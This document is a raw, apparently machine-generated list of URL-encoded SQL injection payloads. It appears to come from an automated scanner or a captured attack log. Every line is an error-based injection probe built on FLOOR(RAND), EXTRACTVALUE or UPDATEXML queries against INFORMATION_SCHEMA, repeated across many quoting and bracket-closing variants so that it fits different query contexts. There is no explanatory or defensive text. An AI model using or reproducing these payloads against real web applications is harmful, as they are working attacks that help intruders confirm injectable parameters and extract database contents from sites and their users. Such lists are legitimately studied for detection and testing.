-3835%27%29%29%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27OTAk%27%20LIKE%20%27OTAk -3738%27%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27HHZP%27%20LIKE%20%27HHZP -9001%22%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22HDmL%22%3D%22HDmL -3497%22%29%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22oLKU%22%3D%22oLKU -1298%22%29%29%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22LZqd%22%3D%22LZqd -9617%22%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22qhCg%22%3D%22qhCg -9251%22%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22dPmC%22%20LIKE%20%22dPmC -6039%22%29%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22ZZZQ%22%20LIKE%20%22ZZZQ -9005%22%29%29%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22KPSU%22%20LIKE%20%22KPSU -5830%22%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22jmWp%22%20LIKE%20%22jmWp -8486%25%27%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27%25%27%3D%27 -7900%25%27%29%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27%25%27%3D%27 -5499%25%27%29%29%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27%25%27%3D%27 -2165%25%27%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27%25%27%3D%27 -9141%00%27%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27vKSA%27%3D%27vKSA -3879%00%27%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27noSB%27%3D%27noSB -1040%27%29%20WHERE%208730%3D8730%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 -5155%22%29%20WHERE%202217%3D2217%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 -5677%29%20WHERE%203887%3D3887%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 -8873%27%20WHERE%208260%3D8260%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 -3498%22%20WHERE%208646%3D8646%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 -9099%20WHERE%205426%3D5426%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 foo%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29 foo%27%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29 foo%27%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29 foo%22%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29 foo%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%282432%3D2432 foo%29%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%286804%3D6804 foo%29%29%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%284057%3D4057 foo%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29 foo%27%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%27rtIX%27%3D%27rtIX foo%27%29%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%27YZVm%27%3D%27YZVm foo%27%29%29%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%28%27vuov%27%3D%27vuov foo%27%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%27uJln%27%3D%27uJln foo%27%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%27Qlqc%27%20LIKE%20%27Qlqc foo%27%29%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%27ftRl%27%20LIKE%20%27ftRl foo%27%29%29%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%28%27dXvO%27%20LIKE%20%27dXvO foo%27%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%27AAUU%27%20LIKE%20%27AAUU foo%22%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%22vmPf%22%3D%22vmPf foo%22%29%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%22bbBQ%22%3D%22bbBQ foo%22%29%29%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%28%22FcEC%22%3D%22FcEC foo%22%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%22LsOG%22%3D%22LsOG foo%22%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%22PAdk%22%20LIKE%20%22PAdk foo%22%29%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%22QXIU%22%20LIKE%20%22QXIU foo%22%29%29%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%28%22kzBM%22%20LIKE%20%22kzBM foo%22%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%22MJid%22%20LIKE%20%22MJid foo%25%27%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%28%27hftW%27%3D%27hftW foo%00%27%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20AND%20%27hQFu%27%3D%27hQFu foo%27%29%20WHERE%208684%3D8684%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20--%20 foo%22%29%20WHERE%206364%3D6364%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20--%20 foo%29%20WHERE%207286%3D7286%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20--%20 foo%27%20WHERE%209294%3D9294%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20--%20 foo%22%20WHERE%206574%3D6574%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20--%20 foo%20WHERE%206742%3D6742%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20--%20 foo%27%7C%7C%28SELECT%20%27FxzU%27%20FROM%20DUAL%20WHERE%203645%3D3645%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27YEPo%27%20WHERE%202148%3D2148%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20sfAz%20WHERE%206515%3D6515%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20%29%2B%27 foo%27%2B%28SELECT%20%27pmqa%27%20WHERE%203377%3D3377%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20OR%20EXTRACTVALUE%288666%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288666%3D8666%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%20%23 foo%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29 foo%27%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29 foo%27%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29 foo%22%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29 foo%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%289525%3D9525 foo%29%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%284872%3D4872 foo%29%29%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%28%288240%3D8240 foo%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29 foo%27%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%27VnKk%27%3D%27VnKk foo%27%29%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%28%27LkTc%27%3D%27LkTc foo%27%29%29%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%28%28%27TQIL%27%3D%27TQIL foo%27%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%27flns%27%3D%27flns foo%27%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%27fJhX%27%20LIKE%20%27fJhX foo%27%29%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%28%27pqiK%27%20LIKE%20%27pqiK foo%27%29%29%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%28%28%27xhjZ%27%20LIKE%20%27xhjZ foo%27%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%27OaPz%27%20LIKE%20%27OaPz foo%22%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%22CmtU%22%3D%22CmtU foo%22%29%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%28%22axFI%22%3D%22axFI foo%22%29%29%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%28%28%22TfCS%22%3D%22TfCS foo%22%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%22TmpM%22%3D%22TmpM foo%22%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%22baXG%22%20LIKE%20%22baXG foo%22%29%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%28%22zMsa%22%20LIKE%20%22zMsa foo%22%29%29%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%28%28%22mOHR%22%20LIKE%20%22mOHR foo%22%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%22jIIU%22%20LIKE%20%22jIIU foo%25%27%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%27%25%27%3D%27 